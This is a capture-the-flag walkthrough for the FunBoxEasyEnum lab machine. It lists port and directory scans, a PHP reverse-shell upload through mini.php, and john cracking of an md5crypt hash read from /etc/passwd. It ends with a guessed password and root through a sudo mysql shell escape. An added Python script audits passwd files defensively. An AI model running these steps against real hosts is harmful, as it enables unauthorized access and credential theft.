FunBoxEasyEnum
IP : 192.168.234.132
Nmap:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Apache default site at 192.168.234.132:80
gobuster dir -k -u -x txt,html,php -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 323] [-->
/mini.php (Status: 200) [Size: 3828]
/robots.txt (Status: 200) [Size: 21]
/phpmyadmin (Status: 301) [Size: 323] [-->
Found a place to upload files at /mini.php
Uploaded PHP reverse shell.
Ran /phpshell.php
Was able to upload a php reverse shell to mini.php.
Got reverse shell.
Read /etc/passwd
$ cat /etc/passwd
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
Bypassed shell restrictions : python3 -c 'import pty;pty.spawn("/bin/bash")'
john hash.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hiphop (oracle)
1g 0:00:00:00 DONE (2022-11-03 17:05) 50.00g/s 19200p/s 19200c/s 19200C/s Sequel!1..sabrina
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
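A defender-side check for the finding above, as an added example that is not part of the original write-up: the oracle account was crackable because its md5crypt hash sat in world-readable /etc/passwd instead of root-only /etc/shadow. The function names are assumptions, and every sample line except the oracle entry is constructed for illustration.

```python
# Added example: audit passwd(5) entries for password material stored outside /etc/shadow.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"md5crypt", "descrypt-or-unknown"}

def classify(pw_field):
    """Classify the second field of a passwd(5) line."""
    if pw_field == "x":
        return "shadowed"            # real hash lives in root-only /etc/shadow
    if pw_field == "":
        return "empty"               # may allow login with no password
    if pw_field.startswith(("*", "!")):
        return "locked"
    if pw_field.startswith("$"):
        parts = pw_field.split("$")  # modular crypt format: $id$salt$hash
        return SCHEMES.get(parts[1], "unknown-crypt") if len(parts) > 2 else "unknown-crypt"
    return "descrypt-or-unknown"     # legacy 13-character DES crypt or junk

def audit_passwd(text):
    """Return (user, kind, severity) for every entry that is not shadowed or locked."""
    findings = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or line.lstrip().startswith("#"):
            continue                 # skip comments and malformed lines
        user, kind = fields[0], classify(fields[1])
        if kind in ("shadowed", "locked"):
            continue
        # Any hash here is readable by all local users; weak schemes and empty fields are worst.
        severity = "critical" if kind in WEAK or kind == "empty" else "high"
        findings.append((user, kind, severity))
    return findings

# Constructed sample: the oracle line is the one shown on this page; the rest are made up.
SAMPLE = r"""root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
svc-backup:*:1500:1500::/nonexistent:/usr/sbin/nologin
demo::1501:1501::/home/demo:/bin/sh
"""

if __name__ == "__main__":
    for user, kind, severity in audit_passwd(SAMPLE):
        print(f"{severity.upper():8} {user}: password field is {kind}, readable by every local user")
```

On a real host, pass the contents of /etc/passwd to `audit_passwd`; any finding should be moved into /etc/shadow and the password rotated.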
su oracle - to switch users
Uploaded linpeas
Found local.txt at /var/www
cat local.txt
Redacted, get your own flag!
Had to get a hint here.... Boxes made where you are expected to guess user's passwords are stupid.
Found password for goat was goat.
sudo -l
User has sudo perms for mysql
sudo mysql -e '\! /bin/sh'
Got Root Woot